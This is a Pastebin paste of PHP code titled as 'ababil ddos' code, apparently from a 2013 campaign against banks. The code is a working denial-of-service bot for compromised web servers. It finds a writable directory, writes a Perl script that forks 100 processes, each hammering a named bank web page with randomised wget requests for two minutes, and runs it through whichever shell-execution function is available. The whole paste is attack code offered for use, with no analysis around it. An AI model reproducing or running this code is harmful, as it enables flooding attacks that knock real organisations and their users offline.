blocklist

ababil ddos code phase3/w5

Apr 2nd, 2013
608
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. function randomvar(){
  3.         $a=chr(rand(97,122));
  4.         $b=rtrim(base64_encode(rand(100,10000)),'=');
  5.         return $a.$b;
  6. }
  7. $url = "http://www.bbt.com/bbtdotcom/financial-education/home_and_residence/accumulate_down_payment.page";
  8. $rand = md5(microtime().rand(0,500));
  9. if(preg_match("/\?/",$url))
  10.         $url .= "&".randomvar()."=".substr($rand,0,rand(4,10));
  11. else
  12.         $url .= "?".randomvar()."=".substr($rand,0,rand(4,10));
  13. if(!function_exists('scandir'))
  14.   {
  15.     function scandir($a,$b=false,$c=true)
  16.       {
  17.         $d=array();
  18.         if($e=opendir($a))
  19.           {
  20.             while(false!==($f=readdir($e)))
  21.               {
  22.                 if(($f!="."&&$f!="..")||$c==true)
  23.                   {
  24.                     if($b==false)
  25.                       if(is_dir($f))
  26.                         continue;
  27.                     array_push($d,basename($f));
  28.                   }
  29.               }
  30.             closedir($e);
  31.           }
  32.         return $d;
  33.       }
  34.   }
  35.  
  36. function on_exit()
  37.   {
  38.     echo "###Assassin###\n";
  39.     echo "\nuau-repeat";
  40.   }
  41.  
  42. if(function_exists('register_shutdown_function'))
  43.    register_shutdown_function("on_exit");
  44.  
  45. fwrite(fopen($h=tgya8siudj().'/'.md5(microtime()),'w'),
  46. "unlink '$h';
  47. $time=time();
  48. for($i = 0;$i < 100;$i++)
  49.  {
  50.    if(fork())
  51.      {
  52.      }
  53.    else
  54.      {
  55.        $j=0;while(time()-$time<120)
  56.          {
  57.            $j++;
  58.            if($j % 100 == 0)
  59.              {
  60.                sleep 1;
  61.              }
  62.            system("wget -U 'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8' -t 45 --delete-after --no-check-certificate '$url' 2>&1 &\");
  63.          }
  64.        last;
  65.      }
  66.    }"
  67.   ); # fwrite Ends
  68.  
  69. iyiuo("perl $h");
  70. echo "###Assassin###";
  71. echo "\nuau-repeat";
  72.  
  73. function iyiuo($r)
  74.   {
  75.      $s="";
  76.      if(!empty($r))
  77.        {
  78.                 if(function_exists('exec'))
  79.                   {
  80.                         @exec($r,$s);
  81.                         $s=join("\n",$s);
  82.                   }
  83.                 elseif(function_exists('shell_exec'))
  84.                         $s=@shell_exec($r);
  85.                 elseif(function_exists('system'))
  86.                   {
  87.                         @ob_start();
  88.                         @system($r);
  89.                         $s=@ob_get_contents();
  90.                         @ob_end_clean();
  91.                   }
  92.                elseif(function_exists('passthru'))
  93.                  {
  94.                         @ob_start();
  95.                         @passthru($r);
  96.                         $s=@ob_get_contents();
  97.                         @ob_end_clean();
  98.                   }
  99.                elseif(function_exists('popen') and @is_resource($t=@popen($r,"r")))
  100.                  {
  101.                         $s="";
  102.                         while(!@feof($t))
  103.                                 $s.=@fread($t,1024);
  104.                         @pclose($t);
  105.                  }
  106.                elseif(function_exists('proc_open'))
  107.                  {
  108.                         $u=proc_open($r,array(array("pipe","r"),array("pipe","w"),array("pipe","w")),$v);
  109.                         $s=stream_get_contents($v[1]);
  110.                         fclose($v[0]);
  111.                         fclose($v[1]);
  112.                         fclose($v[2]);
  113.                         proc_close($u);
  114.                  }
  115.        }
  116.    return $s;
  117.   }
  118.  
  119. function gyhuijoakosdoj()
  120.   {
  121.     $j="";
  122.     if(!isset($_SERVER["DOCUMENT_ROOT"]))
  123.       $_SERVER["DOCUMENT_ROOT"]=substr($_SERVER["SCRIPT_FILENAME"],0,-strlen($_SERVER["SCRIPT_NAME"]));
  124.       $k[]=$_SERVER["DOCUMENT_ROOT"];
  125.       while($k)
  126.         {
  127.           $l=array_pop($k);
  128.           if($m=scandir($l))
  129.             {
  130.               $n=0;
  131.               while(isset($m[$n]))
  132.                 {
  133.                   if($m[$n]!=="."&&$m[$n]!=="..")
  134.                     {
  135.                       $o="{$l}/{$m[$n]}";
  136.                       if(is_dir($o))
  137.                         {
  138.                           $k[]=$o;
  139.                           if(@is_writable($o))
  140.                             {
  141.                               return $o;
  142.                             }
  143.                         }
  144.                     }
  145.                   $n++;
  146.                 }
  147.             }
  148.         }
  149.       return false;
  150.   }
  151.  
  152. function tgya8siudj()
  153.   {
  154.     if(@is_writable('/tmp'))
  155.       return '/tmp';
  156.     elseif(@is_writable(preg_replace('/[^\/]*$/','',$_SERVER['SCRIPT_FILENAME'])))
  157.       return preg_replace('/[^\/]*$/','',$_SERVER['SCRIPT_FILENAME']);
  158.     elseif(!function_exists("sys_gt_temp_dir"))
  159.       {
  160.         if(!empty($_ENV["TMP"])and@is_writable($_ENV["TMP"]))
  161.           return realpath($_ENV["TMP"]);
  162.         elseif(!empty($_ENV["TMPDIR"])and@is_writable($_ENV["TMPDIR"]))
  163.           return realpath($_ENV["TMPDIR"]);
  164.         elseif(!empty($_ENV["TEMP"])and@is_writable($_ENV["TEMP"]))
  165.           return realpath($_ENV["TEMP"]);
  166.         else
  167.           {
  168.             $a=gyhuijoakosdoj();
  169.             if($a==!false)
  170.               return $a;
  171.             $p=tempnam(md5(uniqid(rand(),TRUE)),"");
  172.             if($p)
  173.               {
  174.                 $q=realpath(dirname($p));
  175.                 @unlink($p);
  176.                 return $q;
  177.               }
  178.             else
  179.                return false;
  180.           }
  181.       }
  182.     else
  183.        return sys_get_temp_dir();
  184.   }
  185. exit;
RAW Paste Data